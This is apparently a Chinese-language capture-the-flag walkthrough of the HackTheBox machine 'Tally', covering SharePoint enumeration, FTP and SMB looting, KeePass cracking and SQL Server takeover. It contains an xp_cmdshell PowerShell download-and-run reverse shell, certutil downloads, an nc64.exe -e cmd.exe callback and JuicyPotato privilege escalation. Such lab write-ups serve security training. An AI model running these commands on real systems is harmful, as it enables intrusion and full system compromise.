冬萍子
冬萍子

hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)

1 扫描

端口21想到ftp进去找文件,139 445想到smb进去找文件,但都进不去。80进web搜集信息。看到是sharepoint页面。或者在nmap扫描也可看到32844端口开着,commonname写了是sharepoint。网上查这也是sharepoint的一个默认端口
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第1张图片

在这里插入图片描述

2 sharepoint枚举

sharepoint的文件太多,枚举也是个很麻烦的事。。
可以用这个sharepoint枚举工具

C:\root\exp\SharePointURLBrute v1.1 - 18MAR2012> perl SharePointURLBrute\ v1.1.pl  -a http://10.10.10.59 -e SharePoint-UrlExtensions-18Mar2012.txt


Starting search for common SharePoint Pages
Start Time: Mon May 11 00:52:25 2020

FOUND: http://10.10.10.59/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_layouts/AreaNavigationSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaTemplateSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaWelcomePage.aspx
FOUND: http://10.10.10.59/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://10.10.10.59/_layouts/MyInfo.aspx
FOUND: http://10.10.10.59/_layouts/MyPage.aspx
FOUND: http://10.10.10.59/_layouts/PageSettings.aspx
FOUND: http://10.10.10.59/_layouts/policy.aspx
FOUND: http://10.10.10.59/_layouts/policyconfig.aspx
FOUND: http://10.10.10.59/_layouts/policycts.aspx
FOUND: http://10.10.10.59/_layouts/Policylist.aspx
FOUND: http://10.10.10.59/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://10.10.10.59/_layouts/SiteDirectorySettings.aspx
FOUND: http://10.10.10.59/_layouts/sitemanager.aspx
FOUND: http://10.10.10.59/_Layouts/SiteManager.aspx?lro=all
FOUND: http://10.10.10.59/_vti_bin/alerts.asmx
FOUND: http://10.10.10.59/_vti_bin/dspsts.asmx
FOUND: http://10.10.10.59/_vti_bin/forms.asmx
FOUND: http://10.10.10.59/_vti_bin/Lists.asmx
FOUND: http://10.10.10.59/_vti_bin/people.asmx
FOUND: http://10.10.10.59/_vti_bin/Permissions.asmx
FOUND: http://10.10.10.59/_vti_bin/search.asmx
FOUND: http://10.10.10.59/_vti_bin/UserGroup.asmx
FOUND: http://10.10.10.59/_vti_bin/versions.asmx
FOUND: http://10.10.10.59/_vti_bin/Views.asmx
FOUND: http://10.10.10.59/_vti_bin/webpartpages.asmx
FOUND: http://10.10.10.59/_vti_bin/webs.asmx
FOUND: http://10.10.10.59/_vti_bin/SharepointEmailWS.asmx
FOUND: http://10.10.10.59/_vti_bin/spsearch.asmx
FOUND: http://10.10.10.59/_vti_bin/WebPartPages.asmx
FOUND: http://10.10.10.59/default.aspx
FOUND: http://10.10.10.59/shared documents/forms/allitems.aspx

这么多目录,只能挑那些看起来有料的字眼,比如auth admin allitem viewlist这些比较重点的,优先看。比如最底下的这个目录http://10.10.10.59/shared documents/forms/allitems.aspx可以下载下来并发现密码信息。

hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第2张图片
有了ftp密码,但是没用户,还得继续搜。
dirbuster + /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt 字典。这个字典应该是kali自带的,没有就github找seclists。字典里自带了后缀,所以file extension那里填/

这个viewlst应该是viewlist,list是目录列表,也是可疑文件。
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第3张图片
点开看看hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第4张图片

Documents里面是我们之前看到的密码信息文件。 右边的右边site pages 也显示了里面有一个item。继续点开看看。
但是一点它就重定向了,前面多出来一个目录,把前面的删掉 ,留下http://10.10.10.59/SitePages/Forms/AllPages.aspx
可以看到finance 这个文件了,
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第5张图片

点击,又重定向,再把前面的目录删掉,留下从sitepage开始。文件内容提示了用户是ftp_user
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第6张图片
知道了ftp的账号密码,开始ftp渗透

3 FTP 利用

在user tim file 里找到放密码的数据文件tim.kdbx. 这个在之前的靶机也见过多次了。get下载下来,但是下载之前要输入binary,这个模式下的下载文件才是完整的,否则john解不开。

hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第7张图片

4 kdbx解密

解密

keepass2john tim.kdbx > hashtim
./john --format=KeePass hashtim --wordlist=/usr/share/wordlists/rockyou.txt

hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第8张图片

拿到密码,再用keepass2 tim.kdbx 进入,没有的话apt安装,输入密码,最终看到新的账号密码信息acct share的Finance:Acc0unting

hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第9张图片

5 smb 搜集

acct share看起来就是smb的一个叫acct的分享了。smb还没有利用。开始smb利用

smbclient //10.10.10.59/ACCT -U finance

里面文件太多,信息搜集也是难事。这个目录下像test这样命名的可疑文件不能放过。smb: \zz_Migration\Binaries\New folder\> get tester.exe

接着查看他内部程序strings tester.exe,中间部位看到sql的账号密码DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
在这里插入图片描述

用这个工具sqsh 可以直接远程连接数据库拿shell

sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

但是cmd功能是不稳定的,也是没开启的,所以要指令打开它,参考这篇文章。且记得输入go。
打开后,检测whomai正确运行即可。

C:\root> sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> sp_configure 'show advanced options', '1'
2> go
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE
2> go
1> sp_configure 'xp_cmdshell', '1'
2> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE
2> go
1> xp_cmdshell "whoami";
2> go

        output                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                          
                                                          

        --------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------

        tally\sarah                                                                                                                                       
                                                                                                                                                          
                                                                                                                                                          
                                                          

        NULL                                                                                                                                              
                                                                                                                                                          
                                                                                                                                                          
                                                          

(2 rows affected, return status = 0)

1> xp_cmdshell "powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/Invoke-PowerShellTcp.ps1') "
2> go

cmd打开后开始弹shell。

打开自己的http服务python -m SimpleHTTPServer 80,将自己的powershell。nishang的reverse-shell文件放到http服务里。shell文件最底下一行加上自己回弹ip端口信息Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 4444 这在以前win靶机用ps-shell都讲了很多。

xp_cmdshell "powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/Invoke-PowerShellTcp.ps1') "

靶机会调用这个文件然后回弹shell,打开监听,收到。

hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第10张图片

6 提权

老套路先脚本自动扫一扫winpeas,上传,并运行

PS C:\Windows\system32> cd /windows/temp
PS C:\windows\temp> certutil -urlcache -split -f http://10.10.14.19/winPEAS.exe 666.exe
****  Online  ****
  000000  ...
  03b000
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp> C:\windows\temp\666.exe

发现SeImpersonatePrivilege这个开启了,这就跟hackthebox另一篇conceal靶机很像了这里。都是用potato提权。这里

且看system信息,靶机是win2016 64位.

hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第11张图片

hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第12张图片
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第13张图片

所以CLSID数据用2016的这里。不想麻烦就随便找一个,因为是拿最高权限,所以只要是NT AUTHORITY\SYSTEM就行,一个个试。第一个就可以。
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第14张图片

因为我是在C:\users\public操作这一切。所以一个个传送到靶机的这个目录。且666bat文件写执行内容C:\users\public\nc64.exe -e cmd.exe 10.10.14.19 5555

certutil -urlcache -split -f http://10.10.14.19/nc64.exe nc64.exe
certutil -urlcache -split -f http://10.10.14.19/666.bat 666.bat
certutil -urlcache -split -f http://10.10.14.19/JuicyPotato.exe JuicyPotato.exe

最后执行

C:\users\Public\JuicyPotato.exe -p C:\users\public\666.bat -l 5555 -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"

在这里插入图片描述

本机监听,成功拿下system
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege)_第15张图片

你可能感兴趣的:(hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege))

  • 勇士赢了,我把掌声给了骑士 复角度的生活
    今天,不参加高考,只看NBA总决赛第三场的较量。这么说有点得罪高考生了,不过我没有当他们面秀,也没有跑到考点外面得瑟,所以我内心毫无波澜。毫无疑问,考场里不乏骑士和勇士球迷,在紧张作答语文考卷同时还心系着球队,不过我希望今天的比赛不会让你们有所分心,毕竟高考不会像比赛录像那样可以再来。今天,好像起来赶考一样,我起得很早,然而事实是睡不着,挺郁闷的,又不是我高考,我紧张什么?九点我并没有准时打开浏览
  • 计算机网络八股总结 Petrichorzncu 八股总结计算机网络笔记
    这里写目录标题网络模型划分(五层和七层)及每一层的功能五层网络模型七层网络模型(OSI模型)==三次握手和四次挥手具体过程及原因==三次握手四次挥手TCP/IP协议组成==UDP协议与TCP/IP协议的区别==Http协议相关知识网络地址,子网掩码等相关计算网络模型划分(五层和七层)及每一层的功能五层网络模型应用层:负责处理网络应用程序,如电子邮件、文件传输和网页浏览。主要协议包括HTTP、FTP
  • 教师资格证常考的5个知识点 a3cb74a20840
    知识点1:教育与人的发展(5规律、4因素、3动因)五大规律:顺序性—循序渐进阶段性—不搞“一刀切”不平衡性—抓关键期互补性—扬长避短个别差异性—因材施教考点精华:1.举例子对应五大规律;2.每个规律的教学启示;3规律特点。四大因素:遗传(地位:物质前提、可能性)环境(地位:多种可能、现实性)学校教育(主导)个人主观能动性(动力、决定)三大动因:内发论(1.孟子:性善论;2.弗洛伊德:性本能)外铄论
  • golang实现从服务器下载文件到本地指定目录 余生逆风飞翔 golang服务器开发语言
    一、连接服务器,采用sftp连接模式packagemiddlewaresimport("fmt""time""github.com/pkg/sftp""golang.org/x/crypto/ssh")//建立服务器连接funcConnect(user,password,hoststring,portint)(*sftp.Client,error){var(auth[]ssh.AuthMethod
  • 如何利用Samba跨平台分享Ubuntu文件夹 GottenZZP 部署相关ubuntulinux运维
    1.安装Samba终端输入sudoaptinstallsamba2.配置Samba终端输入sudovim/etc/samba/smb.conf打开配置文件滑动文件到最底下输入以下内容[Share]#要共享的文件夹路径path=/home/xxx/sambasharereadonly=nobrowsable=yes编辑完成后按一下Esc按键后输入:wq回车保存3.重启Samba服务终端输入sudos
  • CentOS7 安装MySQL5.7.44 不要Null了 javacentosmysql
    1.下载mysql安装包,我放在百度网盘里(下方链接)链接:https://pan.baidu.com/s/1_Mn1XW_1mWdTV4mhnLG66A提取码:s31n2.首先看看以前是否安装过mysqlrpm-qa|grep-imysql如果已经安装过mysql会提示卸载mysqlrpm-emysql-…3.使用FinallShell或者Xftp进行上传放到/usr/local/mysql,没
  • 教师资格考试中学《教育知识与能力》知识点|高频考点汇总 小山丘
    温馨提示:更多汇总详情留言小编哦!!!认知过程之易混知识点剖析社会中心课程论情绪——重要考点皮亚杰教你带孩子斯金纳强化规律你的心理足够强大吗?教育心理学的效应德育有规律常考人物思想之夸美纽斯中学常考教学原则孔子及《论语》中的重要教育思想教育学创立阶段人物之赫尔巴特学习策略分类知识点梳理教师资格证辨析题作答思路综合课程的类型班杜拉的学习理论马斯洛需要层次理论记忆类型的四大分类柏拉图和他的《理想国》感
  • PMP冲刺一 Cynric
    记录考点一、计算类考题一般就1题,主要涉及在三大过程组:启动过程组、规划过程组、控制过程组。1.启动过程组项目选择方法涉及名词:NPV净现值、IRR内部收益率、BCR投资回报率、ROI投资利润率、回收期2.规划过程组三点估算PERT法(默认使用贝塔分布)三角分布:Te=(O+M+P)/3贝塔分布:Te=(O+4M+P)/6关键路径法CPM关键路径是相对的,也可以是变化的。路径汇聚固定资产折旧沟通渠
  • Java字符串为何是不可变的? 木南曌 Javajava
    Java中字符串是一个非常常用的数据类型,它不仅在日常编码中频繁使用,也是面试中常见的考点之一。一个经常被讨论的话题是Java中的字符串为何是不可变的。本文将探讨这个问题,并解释其背后的原因。引言在Java中,字符串是通过String类来表示的,这个类有一个很重要的特性,那就是不可变性(Immutability)。这意味着一旦一个字符串对象被创建,它的值就不能被更改。例如,当你试图修改一个字符串时
  • python logging模块默认日志级别_一看就懂,Python 日志 logging 模块详解及应用 路易·罗莎 pythonlogging模块默认日志级别
    日志概述百度百科的日志概述:Windows网络操作系统都设计有各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等等,这些根据你的系统开启的服务的不同而有所不同。我们在系统上进行一些操作时,这些日志文件通常会记录下我们操作的一些相关内容,这些内容对系统安全工作人员相当有用。比如说有人对系统进行了IPC探测,系统就会在安全日志
  • CISSP考点拾遗——软件保障SwA 我全家都是CISSP
    说明:“考点拾遗”系列基于日常为学员和网友做的答疑整理,主要涉及教材中没有完全覆盖到的知识点。Softwareassuranceisthelevelofconfidencethatsoftwareisfreefromvulnerabilities,eitherintentionallydesignedintothesoftwareoraccidentallyinsertedatanytimedur
  • 中考数学想考满分?必须刷完这60道经典压轴题!(高清打印版) 孔文教育QD
    孔文教育启东校区距离中考还有30多天的时间,如果平常数学可以考100分左右的同学,就可以重视一下压轴题的提升,老师整理了60道压轴题,包括了考点解析等内容,可以做起来哦!孩子升入初中之后,学习压力逐渐增加,孩子的学习能力以及适应环境的能力决定孩子能够分到哪个层次。中考决定孩子进入普通高中还是职业高中,这是个很现实的问题,经数据研究,中考的普职分流比为1:1,换言之,假设有100个考生,其中就有50
  • 如何在麒麟操作系统中限制SSH远程登录而不影响FTP Seal^_^ 国产化#麒麟OSssh运维国产化操作系统SSH
    如何在麒麟操作系统中限制SSH远程登录而不影响FTP1、禁止SSH远程登录1.1禁止Root用户1.2禁止特定用户1.3禁止特定用户组2、重启SSHD服务3、注意事项TheBegin点点关注,收藏不迷路在服务器管理中,出于安全考虑,我们经常需要限制特定用户或用户组通过SSH远程登录服务器,但同时保持FTP等服务的正常使用不受影响。本文将详细介绍在麒麟操作系统(假设基于Linux,类似于Ubuntu
  • 浅谈大模型 SFT 的实践落地:十问十答 大模型与自然语言处理 NLP与大模型人工智能大数据深度学习多模态大模型SFT
    节前,我们星球组织了一场算法岗技术&面试讨论会,邀请了一些互联网大厂朋友、参加社招和校招面试的同学.针对算法岗技术趋势、大模型落地项目经验分享、新手如何入门算法岗、该如何准备、面试常考点分享等热门话题进行了深入的讨论。汇总合集:《大模型面试宝典》(2024版)发布!今天给大家带来一篇大模型SFT的实践落地经验总结SFT现在往往被称为“低端”工作,但它与业务紧密相连。相较于难以实施且多数公司没资源训
  • C语言暑假学习刷题——Day4 奋斗小温 C语言c语言学习java
    目录选择题考点一:for循环的理解考点二:while循环和循环嵌套的理解考点三:break在switch语句中的应用考点四:升序插入排序算法的应用考点五:循环嵌套的理解编程题【leetcode题号:645.错误的集合】【难度:简单】【牛客网题号:OR141密码检查】【难度:简单】选择题考点一:for循环的理解1、设变量已正确定义,以下不能统计出一行中输入字符个数(不包含回车符)的程序段是()A:n
  • CURL 发送POST请求 微赚淘客系统@聚娃科技 post请求
    CURL发送POST请求大家好,我是免费搭建查券返利机器人赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!今天,我们将探讨在命令行中使用CURL发送POST请求的详细步骤和用法。什么是CURL?CURL是一个命令行工具和库,用于传输数据,支持众多协议,包括HTTP、HTTPS、FTP、FTPES等。它是开源且跨平台的,广泛应用于网络开发中。CURL发送POST请求的基本
  • Linux下载压缩包:tar.gz、zip、tar.bz2格式全攻略 promise524 Linuxlinux运维服务器后端bashshell
    在Linux中,下载各种格式的压缩包(如.tar.gz、.zip、.tar.bz2等)通常使用命令行工具如wget和curl。1.使用wget下载压缩包wget是Linux中最常用的文件下载工具,支持HTTP、HTTPS、FTP等协议,可以直接从命令行下载文件。基本命令:wget[URL]下载.tar.gz文件wgethttps://test.com/archive.tar.gz此命令将从指定的U
  • 即时通讯开发之TCP/IP中的TCP 协议概述 wecloud1314 tcp/ip网络udp
    终于看到了TCP协议,这是TCP/IP详解里面最重要也是最精彩的部分,要花大力气来读。前面的TFTP和BOOTP都是一些简单的协议,就不写笔记了,写起来也没啥东西。TCP和UDP处在同一层---运输层,但是TCP和UDP最不同的地方是,TCP提供了一种可靠的数据传输服务,TCP是面向连接的,也就是说,利用TCP通信的两台主机首先要经历一个“拨打电话”的过程,等到通信准备结束才开始传输数据,最后结束
  • TCP实现FTP功能 学不会のC tcp/iplinuxc语言网络网络协议
    文件传输协议(FileTransferProtocol,FTP)是一种在网络中进行文件传输的广泛使用的标准协议。作为网络通信中的基础工具,FTP允许用户通过客户端软件与服务器进行交互,实现文件的上传、下载和其他文件操作。FTP工作在OSI模型的应用层,通常使用TCP作为其传输协议,确保数据传输的可靠性和顺序性。项目要求有服务器和客户端代码,基于TCP写的。在同一路径下,将客户端可执行代码复制到其他
  • 2024世界技能大赛某省选拔赛“网络安全项目”B模块--数据包分析(SMB流量) 落寞的魚丶 web安全安全2024世界技能大赛选拔赛网络安全B模块SMB流量分析
    2024世界技能大赛某省选拔赛“网络安全项目”B模块--数据包分析③任务二、网络数据包分析取证解析:总结:任务二、网络数据包分析取证解析:A集团的网络安全监控系统发现有恶意攻击者对集团官方网站进行攻击,并抓取了部分可疑流量包。请您根据捕捉到的流量包,搜寻出网络攻击线索,并分析黑客的恶意行为。本任务素材清单:捕获的网络数据包文件(*.pcap)请按答题卡的要求完成该部分的工作任务。序号任务要求11.
  • 搭建ftp服务器 哆啦A梦_ca52
    1搭建ftp服务器yuminstallvsftpd*-y安装vsftpd服务rpm-qlvsftpd|more查看安装路径systemctlrestartvsftpd.service启用vsftp服务ps-ef|grepvsftpd查看服务是否启用查看安装后的路径ftp://192.168.1.17/pub/安装好了有这个服务了修改配置文件vim/etc/vsftpd/vsftpd.confano
  • 利用TCP编程实现FTP功能 嵌入式----HR tcp/ip网络协议网络
    模拟FTP核心原理:客户端连接服务器后,向服务器发送一个文件。文件名可以通过参数指定,服务器端接收客户端传来的文件(文件名随意),如果文件不存在自动创建文件,如果文件存在,那么清空文件然后写入。项目功能介绍:均有服务器和客户端代码,基于TCP写的。在同一路径下,将客户端可执行代码复制到其他的路径下,接下来在不同的路径下运行服务器和客户端。相当于另外一台电脑在访问服务器。客户端和服务器链接成功后出现
  • TCP/IP端口大全 weixin_34326558 网络操作系统数据库
    1tcpmuxTCP端口服务多路复用5rje远程作业入口7echoEcho服务9discard用于连接测试的空服务11systat用于列举连接了的端口的系统状态13daytime给请求主机发送日期和时间17qotd给连接了的主机发送每日格言18msp消息发送协议19chargen字符生成服务;发送无止境的字符流20ftp-dataFTP数据端口21ftp文件传输协议(FTP)端口;有时被文件服务协
  • sftp上传和下载文件 王小工 Linuxlinux
    SFTP(SSHFileTransferProtocol)是一种基于SSH协议的文件传输协议,它提供了文件传输过程中的加密和验证功能,确保了数据的安全性。SFTP上传和下载文件的过程可以通过多种方式实现,包括使用SFTP客户端软件、命令行工具或编程SDK等。以下是SFTP上传和下载文件的基本步骤和方法:一、SFTP客户端软件操作软件选择与安装:FileZilla:一款广受欢迎的开源FTP客户端,支
  • 如何搭建FTP服务器? 朝畫夕拾
    FTP服务器可以方便的供用户上传,下载文件,对于我们日常的教学,工作都有着很大的帮助,今天小编就为大家讲解下如何在搭建FTP服务器希望对大家有所帮助。工具/原料电脑一台方法/步骤1首先我们创建一个用户账户用于登录FTP进行操作。右键点击桌面的我的电脑点击选择管理选项,进入管理界面打开本地用户和组选项,我们可以看到列表中的用户选项2然后右键用户选项,在下拉菜单中选择新用户,开始建立我们的用户,填写用
  • 软考架构-架构风格 zyhJhon 架构
    一、概念:风格就是架构的模式,比如C/S、B/S架构,比如现实生活中的中式风格、欧式风格描述某一特定应用领域中系统组织的方式软件架构风格反映了领域中众多系统所共有的结构和语义特性,并指导如何将各个模块和子系统有效地组织成一个完整的系统。架构设计的核心问题是能否达到架构级的软件复用架构风格定义了用于描述系统的术语表和一组指导构架系统的规则二、风格分类架构风格考点说明数据流-批处理传统编译器,每个阶段
  • 通信电子线路知识总结(一) udbdbdh 通信电子线路学习方法信息与通信
    本文章根据通信电子线路中的考点和重要知识梳理而成,对于基本的调协放大器的特点和作用以及理想回路,谐振回路中的特点和三极管的相关知识(例如共级接法和导通类型划分)进行梳理。绕射:不适用于较高频率,频率越高,损耗越大,但传播稳定,又称为表面波传播;折射和反射:短波无线电是利用电离层反射的最佳波段,主要靠天空电离层的折射和反射,又称为天波传播;频率比表面波高,但也局限于一段,当频率超过一定值后,电磁波就
  • linux(CentOS、Ubuntu)安装python3.12.2环境 weixin_41934979 linux运维服务器python
    1.下载官网Python安装包wgethttps://www.python.org/ftp/python/3.12.2/Python-3.12.2.tar.xz1.1解压tar-xfPython-3.12.2.tar.xz解压完后切换到Python-3.12.2文件夹(这里根据自己解压的文件夹路径)cd/usr/packages/Python-3.12.2/1.2升级软件包管理器CentOS系统:
  • JavaScript数组操作方法 柒一柒
    JavaScript数组操作方法常见的一些数组操作push、pop、unshift、shiftpush语法:array.push(item1,item2,…,itemX)push()方法:可以将一个或者更多的参数添加在数组的尾部;返回添加后的数组的长度,原数组发生改变。代码示例如下:vararr=[1,2,3,4];vara=arr.push(9,8,7);console.log(a,arr);/
  • Linux搭建Java环境之jdk1.8安装图文教程 yundashi168 Java教程阿里云教程
    Linux的使用相信大家都要用到java吧!在使用java前我们得先安装jdk以及配置环境变量等工作;下面小编给大家分享关于Linux安装jdk的详细步骤:【Linux服务器远程连接工具】xshell6快捷下载,xftp6快捷下载温馨提示:xshell负责编写和执行Linux命令,就是大家都知道的命令行。xftp负责上传和下载文件。两款软件搭配使用。还有一款免费的国产的linux远程连接客户端—f
  • java Illegal overloaded getter method with ambiguous type for propert的解决 zwllxs javajdk
    好久不来iteye,今天又来看看,哈哈,今天碰到在编码时,反射中会抛出 Illegal overloaded getter method with ambiguous type for propert这么个东东,从字面意思看,是反射在获取getter时迷惑了,然后回想起java在boolean值在生成getter时,分别有is和getter,也许我们的反射对象中就有is开头的方法迷惑了jdk,
  • IT人应当知道的10个行业小内幕 beijingjava 工作互联网
    10. 虽然IT业的薪酬比其他很多行业要好,但有公司因此视你为其“佣人”。   尽管IT人士的薪水没有互联网泡沫之前要好,但和其他行业人士比较,IT人的薪资还算好点。在接下的几十年中,科技在商业和社会发展中所占分量会一直增加,所以我们完全有理由相信,IT专业人才的需求量也不会减少。   然而,正因为IT人士的薪水普遍较高,所以有些公司认为给了你这么多钱,就把你看成是公司的“佣人”,拥有你的支配
  • java 实现自定义链表 CrazyMizzz java数据结构
    1.链表结构   链表是链式的结构 2.链表的组成    链表是由头节点,中间节点和尾节点组成    节点是由两个部分组成:       1.数据域       2.引用域 3.链表的实现 &nbs
  • web项目发布到服务器后图片过一会儿消失 麦田的设计者 struts2上传图片永久保存
      作为一名学习了android和j2ee的程序员,我们必须要意识到,客服端和服务器端的交互是很有必要的,比如你用eclipse写了一个web工程,并且发布到了服务器(tomcat)上,这时你在webapps目录下看到了你发布的web工程,你可以打开电脑的浏览器输入http://localhost:8080/工程/路径访问里面的资源。但是,有时你会突然的发现之前用struts2上传的图片
  • CodeIgniter框架Cart类 name 不能设置中文的解决方法 IT独行者 CodeIgniterCart框架 
    今天试用了一下CodeIgniter的Cart类时遇到了个小问题,发现当name的值为中文时,就写入不了session。在这里特别提醒一下。 在CI手册里也有说明,如下: $data = array( 'id' => 'sku_123ABC', 'qty' => 1, '
  • linux回收站 _wy_ linux回收站
    今天一不小心在ubuntu下把一个文件移动到了回收站,我并不想删,手误了。我急忙到Nautilus下的回收站中准备恢复它,但是里面居然什么都没有。     后来我发现这是由于我删文件的地方不在HOME所在的分区,而是在另一个独立的Linux分区下,这是我专门用于开发的分区。而我删除的东东在分区根目录下的.Trash-1000/file目录下,相关的删除信息(删除时间和文件所在
  • jquery回到页面顶端 知了ing htmljquerycss
    html代码: <h1 id="anchor">页面标题</h1> <div id="container">页面内容</div> <p><a href="#anchor" class="topLink">回到顶端</a><
  • B树、B-树、B+树、B*树 矮蛋蛋 B树
    原文地址: http://www.cnblogs.com/oldhorse/archive/2009/11/16/1604009.html B树        即二叉搜索树:        1.所有非叶子结点至多拥有两个儿子(Left和Right); &nb
  • 数据库连接池 alafqq 数据库连接池
    http://www.cnblogs.com/xdp-gacl/p/4002804.html @Anthor:孤傲苍狼 数据库连接池 用MySQLv5版本的数据库驱动没有问题,使用MySQLv6和Oracle的数据库驱动时候报如下错误: java.lang.ClassCastException: $Proxy0 cannot be cast to java.sql.Connec
  • java泛型 百合不是茶 java泛型
    泛型 在Java SE 1.5之前,没有泛型的情况的下,通过对类型Object的引用来实现参数的“任意化”,任意化的缺点就是要实行强制转换,这种强制转换可能会带来不安全的隐患   泛型的特点:消除强制转换 确保类型安全 向后兼容   简单泛型的定义:      泛型:就是在类中将其模糊化,在创建对象的时候再具体定义 class fan
  • javascript闭包[两个小测试例子] bijian1013 JavaScriptJavaScript
    一.程序一 <script> var name = "The Window"; var Object_a = {   name : "My Object",   getNameFunc : function(){ var that = this;     return function(){     
  • 探索JUnit4扩展:假设机制(Assumption) bijian1013 javaAssumptionJUnit单元测试
    一.假设机制(Assumption)概述        理想情况下,写测试用例的开发人员可以明确的知道所有导致他们所写的测试用例不通过的地方,但是有的时候,这些导致测试用例不通过的地方并不是很容易的被发现,可能隐藏得很深,从而导致开发人员在写测试用例时很难预测到这些因素,而且往往这些因素并不是开发人员当初设计测试用例时真正目的,
  • 【Gson四】范型POJO的反序列化 bit1129 POJO
    在下面这个例子中,POJO(Data类)是一个范型类,在Tests中,指定范型类为PieceData,POJO初始化完成后,通过 String str = new Gson().toJson(data); 得到范型化的POJO序列化得到的JSON串,然后将这个JSON串反序列化为POJO   import com.google.gson.Gson; import java.
  • 【Spark八十五】Spark Streaming分析结果落地到MySQL bit1129 Stream
    几点总结: 1. DStream.foreachRDD是一个Output Operation,类似于RDD的action,会触发Job的提交。DStream.foreachRDD是数据落地很常用的方法 2. 获取MySQL Connection的操作应该放在foreachRDD的参数(是一个RDD[T]=>Unit的函数类型),这样,当foreachRDD方法在每个Worker上执行时,
  • NGINX + LUA实现复杂的控制 ronin47 nginx lua
    安装lua_nginx_module 模块 lua_nginx_module 可以一步步的安装,也可以直接用淘宝的OpenResty Centos和debian的安装就简单了。。 这里说下freebsd的安装: fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz tar zxvf lua-5.1.4.tar.gz cd lua-5.1.4 ma
  • java-递归判断数组是否升序 bylijinnan java
    public class IsAccendListRecursive { /*递归判断数组是否升序 * if a Integer array is ascending,return true * use recursion */ public static void main(String[] args){ IsAccendListRecursiv
  • Netty源码学习-DefaultChannelPipeline2 bylijinnan javanetty
    Netty3的API http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/ChannelPipeline.html 里面提到ChannelPipeline的一个“pitfall”: 如果ChannelPipeline只有一个handler(假设为handlerA)且希望用另一handler(假设为handlerB) 来
  • Java工具之JPS chinrui java
    JPS使用     熟悉Linux的朋友们都知道,Linux下有一个常用的命令叫做ps(Process Status),是用来查看Linux环境下进程信息的。同样的,在Java Virtual Machine里面也提供了类似的工具供广大Java开发人员使用,它就是jps(Java Process Status),它可以用来
  • window.print分页打印 ctrain window
    function init() { var tt = document.getElementById("tt"); var childNodes = tt.childNodes[0].childNodes; var level = 0; for (var i = 0; i < childNodes.length; i++) {
  • 安装hadoop时 执行jps命令Error occurred during initialization of VM daizj jdkhadoopjps
    在安装hadoop时,执行JPS出现下面错误   [slave16][email protected]:/tmp/hsperfdata_hdfs# jps Error occurred during initialization of VM java.lang.Error: Properties init: Could not determine current working
  • PHP开发大型项目的一点经验 dcj3sjt126com PHP重构
    一、变量 最好是把所有的变量存储在一个数组中,这样在程序的开发中可以带来很多的方便,特别是当程序很大的时候。变量的命名就当适合自己的习惯,不管是用拼音还是英语,至少应当有一定的意义,以便适合记忆。变量的命名尽量规范化,不要与PHP中的关键字相冲突。 二、函数 PHP自带了很多函数,这给我们程序的编写带来了很多的方便。当然,在大型程序中我们往往自己要定义许多个函数,几十
  • android笔记之--向网络发送GET/POST请求参数 dcj3sjt126com android
    使用GET方法发送请求 private static boolean sendGETRequest (String path, Map<String, String> params) throws Exception{ //发送地http://192.168.100.91:8080/videoServi
